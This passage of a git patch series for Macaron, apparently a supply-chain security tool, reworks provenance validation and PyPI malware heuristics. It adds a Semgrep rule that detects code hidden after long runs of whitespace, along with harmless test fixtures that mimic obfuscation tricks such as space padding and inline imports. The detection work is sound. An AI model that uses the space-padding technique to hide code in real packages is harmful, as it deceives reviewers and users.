bool: """Validate a json document against a cue expectation. Parameters ---------- - expectation: str | None - The cue expectation content. - prov: JsonType - The provenance payload. + expectation_path: str + The cue expectation path. + prov_stmt_path: str + The provenance statement path. Returns ------- @@ -78,20 +76,36 @@ def validate_expectation(expectation: str | None, prov: JsonType) -> bool: Raises ------ - CUERuntimeError, CUEExpectationError + CUERuntimeError If expectation is invalid or unable to validate the expectation by invoking the shared library. """ - if not expectation: - raise CUEExpectationError("CUE policies is empty.") - - expectation_buffer = ctypes.create_string_buffer(bytes(expectation, encoding="utf-8")) - prov_buffer = ctypes.create_string_buffer(bytes(json.dumps(prov), encoding="utf-8")) - - def _errcheck(result: int, func: Callable, args: tuple) -> int: # pylint: disable=unused-argument - if result == -1: - raise CUERuntimeError("Unable to validate the CUE expectation") - return result - - cue.target.errcheck = _errcheck # type: ignore - result = bool(cue.validate(expectation_buffer, prov_buffer)) - return result + cmd = [ + os.path.join(MACARON_PATH, "bin", "cuevalidator"), + "-validate-policy", + expectation_path, + "-validate-provenance", + prov_stmt_path, + ] + + try: + result = subprocess.run( # nosec B603 + cmd, + capture_output=True, + check=True, + cwd=MACARON_PATH, + timeout=defaults.getint("cue_validator", "timeout", fallback=30), + ) + except ( + subprocess.CalledProcessError, + subprocess.TimeoutExpired, + FileNotFoundError, + ) as error: + raise CUERuntimeError("Unable to process CUE expectation or provenance.") from error + + if result.returncode == 0: + if result.stdout.decode("utf-8") == "True": + return True + if result.stdout.decode("utf-8") == "False": + return False + + raise CUERuntimeError("Something unexpected happened while validating the provenance against CUE expectation.") diff --git a/src/macaron/slsa_analyzer/provenance/expectations/expectation.py b/src/macaron/slsa_analyzer/provenance/expectations/expectation.py index 093ba6625..69dc56df9 100644 --- a/src/macaron/slsa_analyzer/provenance/expectations/expectation.py +++ b/src/macaron/slsa_analyzer/provenance/expectations/expectation.py @@ -1,8 +1,10 @@ -# Copyright (c) 2023 - 2024, Oracle and/or its affiliates. All rights reserved. +# Copyright (c) 2023 - 2025, Oracle and/or its affiliates. All rights reserved. # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. """This module provides a base class for provenance expectation verifiers.""" +import json +import tempfile from abc import abstractmethod from collections.abc import Callable from typing import Any, Self @@ -89,6 +91,12 @@ def validate(self, prov: InTotoPayload) -> bool: If there are errors happened during the validation process. """ if not self._validator: - raise ExpectationRuntimeError(f"Cannot find the validator for expectation {self.path}") + raise ExpectationRuntimeError(f"Unable to find the validator for expectation {self.path}") - return self._validator(prov.statement) # pylint: disable=not-callable + with tempfile.NamedTemporaryFile(suffix=".json", mode="w+", delete=True) as prov_stmt_file: + prov_stmt_file.write(json.dumps(prov.statement)) + # Rewind the file pointer before reading.. + prov_stmt_file.seek(0) + return self._validator(prov_stmt_file.name) # pylint: disable=not-callable + + raise ExpectationRuntimeError("Unable to validate the expectation.") diff --git a/tests/slsa_analyzer/provenance/expectations/cue/test_cue_validator.py b/tests/slsa_analyzer/provenance/expectations/cue/test_cue_validator.py index 71aa0b793..207b05fd2 100644 --- a/tests/slsa_analyzer/provenance/expectations/cue/test_cue_validator.py +++ b/tests/slsa_analyzer/provenance/expectations/cue/test_cue_validator.py @@ -1,14 +1,14 @@ -# Copyright (c) 2023 - 2024, Oracle and/or its affiliates. All rights reserved. +# Copyright (c) 2023 - 2025, Oracle and/or its affiliates. All rights reserved. # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. """This module tests the CUE expectation validator.""" -import json import os from pathlib import Path import pytest +from macaron.errors import CUERuntimeError from macaron.slsa_analyzer.provenance.expectations.cue import CUEExpectation from macaron.slsa_analyzer.provenance.expectations.cue.cue_validator import get_target, validate_expectation @@ -37,16 +37,23 @@ def test_make_expectation(expectation_path: str) -> None: ("expectation_path", "expected"), [ (os.path.join(EXPECT_RESOURCE_PATH, "valid_expectations", "urllib3_PASS.cue"), PACKAGE_URLLIB3), - (os.path.join(EXPECT_RESOURCE_PATH, "valid_expectations", "urllib3_FAIL.cue"), ""), ], ) def test_get_target(expectation_path: str, expected: str) -> None: """Test getting target from valid CUE expectations.""" - expectation = CUEExpectation.make_expectation(expectation_path=expectation_path) - if expectation: - assert get_target(expectation.text) == expected - else: - raise ValueError("Expected a valid expectation.") + assert get_target(expectation_path) == expected + + +@pytest.mark.parametrize( + "expectation_path", + [ + os.path.join(EXPECT_RESOURCE_PATH, "valid_expectations", "urllib3_FAIL.cue"), + ], +) +def test_no_target(expectation_path: str) -> None: + """Test getting target from valid CUE expectations that misses a target.""" + with pytest.raises(CUERuntimeError): + get_target(expectation_path) @pytest.mark.parametrize( @@ -76,10 +83,4 @@ def test_get_target(expectation_path: str, expected: str) -> None: ) def test_validate_expectation(expectation_path: str, prov_path: str, expected: bool) -> None: """Test validating CUE expectations against provenances.""" - expectation = CUEExpectation.make_expectation(expectation_path=expectation_path) - if expectation: - with open(prov_path, encoding="utf-8") as prov_file: - provenance = json.load(prov_file) - assert validate_expectation(expectation.text, provenance) == expected - else: - raise ValueError("Expected a valid expectation.") + assert validate_expectation(expectation_path, prov_path) == expected From 540cf2de1ca395812cb0ab87645a68c1538eb38b Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 12 Jun 2025 13:34:27 +1000 Subject: [PATCH 08/14] fix: include inspector links with information on if they are reachable. (#1102) The detail info containing inspector links now contains links as keys regardless of whether they are reachable, and includes a boolean value for reachability. Signed-off-by: Carl Flottmann --- .../pypi_heuristics/metadata/wheel_absence.py | 10 +++++----- tests/malware_analyzer/pypi/test_wheel_absence.py | 6 +++--- 2 files changed, 8 insertions(+), 8 deletions(-) diff --git a/src/macaron/malware_analyzer/pypi_heuristics/metadata/wheel_absence.py b/src/macaron/malware_analyzer/pypi_heuristics/metadata/wheel_absence.py index 3a3033e22..0198a932d 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/metadata/wheel_absence.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/metadata/wheel_absence.py @@ -70,7 +70,8 @@ def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicRes logger.debug(error_msg) raise HeuristicAnalyzerValueError(error_msg) - inspector_links: list[JsonType] = [] + # Contains a boolean field identifying if the link is reachable by this Macaron instance or not. + inspector_links: dict[str, JsonType] = {} wheel_present: bool = False release_distributions = json_extract(releases, [version], list) @@ -120,10 +121,9 @@ def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicRes ) # use a head request because we don't care about the response contents - if send_head_http_raw(inspector_link) is None: - inspector_links.append(None) - else: - inspector_links.append(inspector_link) + inspector_links[inspector_link] = False + if send_head_http_raw(inspector_link): + inspector_links[inspector_link] = True # link was reachable detail_info: dict[str, JsonType] = { "inspector_links": inspector_links, diff --git a/tests/malware_analyzer/pypi/test_wheel_absence.py b/tests/malware_analyzer/pypi/test_wheel_absence.py index 3cfccfbe7..b79df0b7f 100644 --- a/tests/malware_analyzer/pypi/test_wheel_absence.py +++ b/tests/malware_analyzer/pypi/test_wheel_absence.py @@ -75,7 +75,7 @@ def test_analyze_tar_present(mock_send_head_http_raw: MagicMock, pypi_package_js mock_send_head_http_raw.return_value = MagicMock() # assume valid URL for testing purposes expected_detail_info = { - "inspector_links": [inspector_link_expected], + "inspector_links": {inspector_link_expected: True}, } expected_result: tuple[HeuristicResult, dict] = (HeuristicResult.FAIL, expected_detail_info) @@ -134,7 +134,7 @@ def test_analyze_whl_present(mock_send_head_http_raw: MagicMock, pypi_package_js mock_send_head_http_raw.return_value = MagicMock() # assume valid URL for testing purposes expected_detail_info = { - "inspector_links": [inspector_link_expected], + "inspector_links": {inspector_link_expected: True}, } expected_result: tuple[HeuristicResult, dict] = (HeuristicResult.PASS, expected_detail_info) @@ -222,7 +222,7 @@ def test_analyze_both_present(mock_send_head_http_raw: MagicMock, pypi_package_j mock_send_head_http_raw.return_value = MagicMock() # assume valid URL for testing purposes expected_detail_info = { - "inspector_links": [wheel_link_expected, tar_link_expected], + "inspector_links": {wheel_link_expected: True, tar_link_expected: True}, } expected_result: tuple[HeuristicResult, dict] = (HeuristicResult.PASS, expected_detail_info) From d943e7b115d15db5a0eebb334cb3b026b6402e73 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Fri, 13 Jun 2025 09:46:34 +1000 Subject: [PATCH 09/14] docs: include source code analysis subsection in malicious package tutorial (#1101) Signed-off-by: Carl Flottmann --- docs/source/pages/cli_usage/command_analyze.rst | 7 +++++++ .../pages/tutorials/detect_malicious_package.rst | 16 ++++++++++++++++ 2 files changed, 23 insertions(+) diff --git a/docs/source/pages/cli_usage/command_analyze.rst b/docs/source/pages/cli_usage/command_analyze.rst index a04f88bd2..e5fa9b1db 100644 --- a/docs/source/pages/cli_usage/command_analyze.rst +++ b/docs/source/pages/cli_usage/command_analyze.rst @@ -84,6 +84,13 @@ Options Allow the analysis to attempt to verify provenance files as part of its normal operations. +.. option:: --force-analyze-source + + Forces PyPI sourcecode analysis to run regardless of other heuristic results. Requires '--analyze-source'. + +.. option:: --analyze-source + + For improved malware detection, analyze the source code of the (PyPI) package using a textual scan and dataflow analysis. ----------- Environment diff --git a/docs/source/pages/tutorials/detect_malicious_package.rst b/docs/source/pages/tutorials/detect_malicious_package.rst index 22c236700..907d7827a 100644 --- a/docs/source/pages/tutorials/detect_malicious_package.rst +++ b/docs/source/pages/tutorials/detect_malicious_package.rst @@ -122,6 +122,22 @@ Note that the ``match`` constraint applies a regex pattern and can be expanded t is_component(component_id, purl), match("pkg:pypi.*", purl). +'''''''''''''''''''' +Source Code Analysis +'''''''''''''''''''' + +.. note:: This is a new feature recently added to Macaron. + +Macaron supports static code analysis as a malware analysis heuristic. This can be enabled by supplying the command line argument ``--analyze-source``. Macaron uses the open-source static code analysis tool Semgrep to analyse the source code of a python package, looking for malicious code patterns defined in Macaron's own Semgrep rules. Example detection patterns include identifying attempts to obfuscate source code and detecting code that exfiltrates sensitive data to remote connections. + +By default, the source code analyzer is run in conjunction with the other metadata heuristics. The source code heuristic is optimised such that it is not always required to be run to ensure a package is benign, so it will not always be run as part of the heuristic analysis, even when enabled. To force it to run regardless of the result of other heuristics, the command line argument ``--force-analyze-source`` must be supplied. To analyze ``django@5.0.6`` with source code analysis enabled and enforced, the following command may be run: + +.. code-block:: shell + + ./run_macaron.sh analyze -purl pkg:pypi/django@5.0.6 --python-venv "/tmp/.django_venv" --analyze-source --force-analyze-source + +If any suspicious patterns are triggered, this will be identified in the ``mcn_detect_malicious_metadata_1`` result for the heuristic named ``suspicious_patterns``. The output database ``output/macaron.db`` can be used to get the specific results of the analysis by querying the :class:`detect_malicious_metadata_check.result field `. This will provide detailed JSON information about all data collected by the ``mcn_detect_malicious_metadata_1`` check, including, for source code analysis, any malicious code patterns detected, what Semgrep rule detected it, the file in which it was detected, and the line number for the detection. + +++++++++++++++++++++++++++++++++++++++ Verification Summary Attestation report +++++++++++++++++++++++++++++++++++++++ From f28a8cdc5301249377d047831385a9d6140e3fcc Mon Sep 17 00:00:00 2001 From: Raouane Amine Date: Fri, 13 Jun 2025 04:04:50 +0100 Subject: [PATCH 10/14] fix(pypi): update get_maintainers_of_package to avoid request blocking (#1097) Signed-off-by: Amine --- src/macaron/slsa_analyzer/package_registry/pypi_registry.py | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py index 13156f7f7..f0cfcfbc3 100644 --- a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py +++ b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py @@ -320,7 +320,8 @@ def get_package_page(self, package_name: str) -> str | None: str | None The package main page. """ - url = os.path.join(self.registry_url, "project", package_name) + # Important: trailing '/' avoids JS-based redirect; ensures Macaron can access the page directly + url = urllib.parse.urljoin(self.registry_url, f"project/{package_name}/") response = send_get_http_raw(url) if response: html_snippets = response.content.decode("utf-8") @@ -360,7 +361,8 @@ def get_maintainer_profile_page(self, username: str) -> str | None: str | None The profile page. """ - url = os.path.join(self.registry_url, "user", username) + # Important: trailing '/' avoids JS-based redirect; ensures Macaron can access the page directly + url = urllib.parse.urljoin(self.registry_url, f"user/{username}/") response = send_get_http_raw(url, headers=None) if response: html_snippets = response.content.decode("utf-8") From c2b016a8f60e946f75b2b0696b30e0ff1db002ad Mon Sep 17 00:00:00 2001 From: Amine Date: Mon, 19 May 2025 19:33:06 +0100 Subject: [PATCH 11/14] feat(heuristics): add Whitespace Check to detect excessive spacing and invisible characters Signed-off-by: Amine --- .../pypi_heuristics/sourcecode/white_spaces.py | 9 ++------- 1 file changed, 2 insertions(+), 7 deletions(-) diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py index 0807afd80..16521dba6 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py @@ -48,16 +48,11 @@ def _load_defaults(self) -> int: The repeated spaces threshold. """ section_name = "heuristic.pypi" - default_threshold = 50 - if defaults.has_section(section_name): section = defaults[section_name] - value_str = section.get("repeated_spaces_threshold", fallback=str(default_threshold)) - if value_str is not None and value_str.isdigit(): - return int(value_str) - return default_threshold + return section.getint("repeated_spaces_threshold", 50) - return default_threshold + return 50 def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: """Analyze the package. From 2cbfd7b343ad65e1e6b87812a5c3523eda87de62 Mon Sep 17 00:00:00 2001 From: Amine Date: Mon, 26 May 2025 10:51:13 +0100 Subject: [PATCH 12/14] chore: add config variable to defaults.ini and minor cleanup Signed-off-by: Amine --- .gitignore | 4 ++++ .../pypi_heuristics/sourcecode/white_spaces.py | 9 +++++++-- 2 files changed, 11 insertions(+), 2 deletions(-) diff --git a/.gitignore b/.gitignore index 4893a7151..4fd45e91a 100644 --- a/.gitignore +++ b/.gitignore @@ -182,7 +182,11 @@ bin/ requirements.txt .macaron_env_file <<<<<<< HEAD +<<<<<<< HEAD .DS_Store ======= **/.DS_Store >>>>>>> 1c65d5f (feat(security): add package name typosquatting detection (#1059)) +======= +.DS_Store +>>>>>>> caddb2a (chore: add config variable to defaults.ini and minor cleanup) diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py index 16521dba6..0807afd80 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py @@ -48,11 +48,16 @@ def _load_defaults(self) -> int: The repeated spaces threshold. """ section_name = "heuristic.pypi" + default_threshold = 50 + if defaults.has_section(section_name): section = defaults[section_name] - return section.getint("repeated_spaces_threshold", 50) + value_str = section.get("repeated_spaces_threshold", fallback=str(default_threshold)) + if value_str is not None and value_str.isdigit(): + return int(value_str) + return default_threshold - return 50 + return default_threshold def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: """Analyze the package. From 697106a48cf410e6389e8e610d4a011b92bba229 Mon Sep 17 00:00:00 2001 From: Amine Date: Tue, 17 Jun 2025 16:17:45 +0100 Subject: [PATCH 13/14] feat(heuristics): add Whitespace Check to Semgrep Signed-off-by: Amine --- .../sourcecode/white_spaces.py | 103 ------------------ .../pypi_malware_rules/obfuscation.yaml | 9 ++ .../checks/detect_malicious_metadata_check.py | 1 - .../obfuscation/excessive_spacing.py | 25 +++++ .../obfuscation/expected_results.json | 15 +++ .../obfuscation/inline_imports.py | 2 +- .../pypi/test_white_spaces.py | 70 ------------ 7 files changed, 50 insertions(+), 175 deletions(-) delete mode 100644 src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py create mode 100644 tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/excessive_spacing.py delete mode 100644 tests/malware_analyzer/pypi/test_white_spaces.py diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py deleted file mode 100644 index 0807afd80..000000000 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/white_spaces.py +++ /dev/null @@ -1,103 +0,0 @@ -# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. -# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. - -"""This analyzer checks if the package has white spaces or invisible characters in the code.""" - -import logging -import re - -from macaron.config.defaults import defaults -from macaron.json_tools import JsonType -from macaron.malware_analyzer.pypi_heuristics.base_analyzer import BaseHeuristicAnalyzer -from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult, Heuristics -from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset - -logger: logging.Logger = logging.getLogger(__name__) - - -class WhiteSpacesAnalyzer(BaseHeuristicAnalyzer): - """Check whether the code has successive white spaces or invisible characters.""" - - INVISIBLE_CHARS = [ - "\u200b", - "\u200c", - "\u200d", - "\ufeff", - "\u200e", - "\u200f", - "\u00a0", - "\u00ad", - " ", - ] - - def __init__(self) -> None: - super().__init__( - name="white_spaces_analyzer", - heuristic=Heuristics.WHITE_SPACES, - depends_on=None, - ) - - self.repeated_spaces_threshold = self._load_defaults() - - def _load_defaults(self) -> int: - """Load default settings from defaults.ini. - - Returns - ------- - int: - The repeated spaces threshold. - """ - section_name = "heuristic.pypi" - default_threshold = 50 - - if defaults.has_section(section_name): - section = defaults[section_name] - value_str = section.get("repeated_spaces_threshold", fallback=str(default_threshold)) - if value_str is not None and value_str.isdigit(): - return int(value_str) - return default_threshold - - return default_threshold - - def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: - """Analyze the package. - - Parameters - ---------- - pypi_package_json: PyPIPackageJsonAsset - The PyPI package JSON asset object. - - Returns - ------- - tuple[HeuristicResult, dict[str, JsonType]]: - The result and related information collected during the analysis. - """ - scripts: dict[str, str] | None = pypi_package_json.get_sourcecode() - if scripts is None: - return HeuristicResult.SKIP, {} - - for file, content in scripts.items(): - if file.endswith(".py") and self.has_white_spaces(content): - return HeuristicResult.FAIL, { - "file": file, - } - return HeuristicResult.PASS, {} - - def has_white_spaces(self, code_string: str) -> bool: - """Check for excessive or invisible whitespace characters in a code string. - - Parameters - ---------- - code_string: str - The code string to check. - - Returns - ------- - bool: - True if suspicious patterns are found, False otherwise. - """ - char_class = "".join(self.INVISIBLE_CHARS) - regex_pattern = f"[{char_class}]{{{self.repeated_spaces_threshold},}}" - if re.search(regex_pattern, code_string, re.DOTALL): - return True - return False diff --git a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml index 6d6ea066b..12b164614 100644 --- a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml +++ b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml @@ -311,3 +311,12 @@ rules: - pattern: os.writev(...) - pattern: os.pwrite(...) - pattern: os.pwritev(...) + +- id: obfuscation_excessive-spacing + metadata: + description: Detects the use of excessive spacing in code, which may indicate obfuscation or hidden code. + message: Hidden code after excessive spacing + languages: + - python + severity: WARNING + pattern-regex: ' {50,}[^ ]+' diff --git a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py index 80a53d610..c9c44ae7c 100644 --- a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py +++ b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py @@ -28,7 +28,6 @@ from macaron.malware_analyzer.pypi_heuristics.metadata.wheel_absence import WheelAbsenceAnalyzer from macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer import PyPISourcecodeAnalyzer from macaron.malware_analyzer.pypi_heuristics.sourcecode.suspicious_setup import SuspiciousSetupAnalyzer -from macaron.malware_analyzer.pypi_heuristics.sourcecode.white_spaces import WhiteSpacesAnalyzer from macaron.slsa_analyzer.analyze_context import AnalyzeContext from macaron.slsa_analyzer.checks.base_check import BaseCheck from macaron.slsa_analyzer.checks.check_result import CheckResultData, CheckResultType, Confidence, JustificationType diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/excessive_spacing.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/excessive_spacing.py new file mode 100644 index 000000000..22ea38a6f --- /dev/null +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/excessive_spacing.py @@ -0,0 +1,25 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +""" +Running this code will not produce any malicious behavior, but code isolation measures are +in place for safety. +""" + +import sys + +# ensure no symbols are exported so this code cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it. This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. + """ + sys.exit() + + # excessive spacing obfuscation + def excessive_spacing_flow(): + print("Hello world!") diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json index aabf72e18..218c6acbe 100644 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json @@ -229,6 +229,21 @@ "end": 68 } ] + }, + "src.macaron.resources.pypi_malware_rules.obfuscation_excessive-spacing": { + "message": "Hidden code after excessive spacing", + "detections": [ + { + "file": "obfuscation/excessive_spacing.py", + "start": 25, + "end": 25 + }, + { + "file": "obfuscation/inline_imports.py", + "start": 27, + "end": 28 + } + ] } }, "disabled_sourcecode_rule_findings": {} diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/inline_imports.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/inline_imports.py index 80e006781..4e37c7c02 100644 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/inline_imports.py +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/inline_imports.py @@ -24,7 +24,7 @@ def test_function(): __import__('builtins') __import__('subprocess') __import__('sys') - __import__('os') + print("Hello world!") ;__import__('os') __import__('zlib') __import__('marshal') # these both just import builtins diff --git a/tests/malware_analyzer/pypi/test_white_spaces.py b/tests/malware_analyzer/pypi/test_white_spaces.py deleted file mode 100644 index 500ef00b5..000000000 --- a/tests/malware_analyzer/pypi/test_white_spaces.py +++ /dev/null @@ -1,70 +0,0 @@ -# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. -# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. - -"""Tests for the WhiteSpacesAnalyzer heuristic.""" -# pylint: disable=redefined-outer-name - - -from unittest.mock import MagicMock - -import pytest - -from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult -from macaron.malware_analyzer.pypi_heuristics.sourcecode.white_spaces import WhiteSpacesAnalyzer - - -@pytest.fixture() -def analyzer() -> WhiteSpacesAnalyzer: - """Pytest fixture to create a WhiteSpacesAnalyzer instance.""" - analyzer_instance = WhiteSpacesAnalyzer() - return analyzer_instance - - -def test_analyze_no_sourcecode(analyzer: WhiteSpacesAnalyzer, pypi_package_json: MagicMock) -> None: - """Test the analyzer skips when there is no source code.""" - pypi_package_json.get_sourcecode.return_value = None - result, info = analyzer.analyze(pypi_package_json) - assert result == HeuristicResult.SKIP - assert info == {} - - -def test_analyze_pass(analyzer: WhiteSpacesAnalyzer, pypi_package_json: MagicMock) -> None: - """Test the analyzer passes when no suspicious whitespace is found.""" - pypi_package_json.get_sourcecode.return_value = {"test.py": "print('hello')"} - result, info = analyzer.analyze(pypi_package_json) - assert result == HeuristicResult.PASS - assert info == {} - - -def test_analyze_fail_long_spaces(analyzer: WhiteSpacesAnalyzer, pypi_package_json: MagicMock) -> None: - """Test the analyzer fails when long spaces are found.""" - repeated_spaces_threshold = analyzer.repeated_spaces_threshold - code = f"print('hello')\n{' ' * (repeated_spaces_threshold + 1)}print('world')" - pypi_package_json.get_sourcecode.return_value = {"test.py": code} - result, info = analyzer.analyze(pypi_package_json) - assert result == HeuristicResult.FAIL - assert info["file"] == "test.py" - - -def test_analyze_fail_invisible_chars(analyzer: WhiteSpacesAnalyzer, pypi_package_json: MagicMock) -> None: - """Test the analyzer fails when invisible characters are found.""" - repeated_spaces_threshold = analyzer.repeated_spaces_threshold - invisible_char = "\u200b" # Zero-width space. - code = f"print('hello'){invisible_char * repeated_spaces_threshold}print('world')" - pypi_package_json.get_sourcecode.return_value = {"test.py": code} - result, info = analyzer.analyze(pypi_package_json) - assert result == HeuristicResult.FAIL - assert info["file"] == "test.py" - - -def test_has_white_spaces_long_spaces(analyzer: WhiteSpacesAnalyzer) -> None: - """Test has_white_spaces method with long spaces.""" - repeated_spaces_threshold = analyzer.repeated_spaces_threshold - code = f"print('hello')\n{' ' * repeated_spaces_threshold}print('world')" - assert analyzer.has_white_spaces(code) - - -def test_has_white_spaces_no_suspicious(analyzer: WhiteSpacesAnalyzer) -> None: - """Test has_white_spaces method with no suspicious whitespace.""" - code = "print('hello')\nprint('world')" - assert not analyzer.has_white_spaces(code) From a62851ebd8db0c700a24b2ea697676078359ea17 Mon Sep 17 00:00:00 2001 From: Amine Date: Mon, 23 Jun 2025 23:29:31 +0100 Subject: [PATCH 14/14] refactor(semgrep): update excessive spacing regex and clarify obfuscation threshold Signed-off-by: Amine --- src/macaron/resources/pypi_malware_rules/obfuscation.yaml | 3 ++- .../sourcecode_samples/obfuscation/expected_results.json | 4 ++-- 2 files changed, 4 insertions(+), 3 deletions(-) diff --git a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml index 12b164614..6071d2157 100644 --- a/src/macaron/resources/pypi_malware_rules/obfuscation.yaml +++ b/src/macaron/resources/pypi_malware_rules/obfuscation.yaml @@ -319,4 +319,5 @@ rules: languages: - python severity: WARNING - pattern-regex: ' {50,}[^ ]+' + pattern-either: + - pattern-regex: '[ \t\n\r\f\v]{50,}[^ \t\n\r\f\v]+' # The 50 here is the threshold for excessive spacing , more than that is considered obfuscation diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json index 218c6acbe..78b1467a2 100644 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json @@ -235,13 +235,13 @@ "detections": [ { "file": "obfuscation/excessive_spacing.py", - "start": 25, + "start": 24, "end": 25 }, { "file": "obfuscation/inline_imports.py", "start": 27, - "end": 28 + "end": 27 } ] }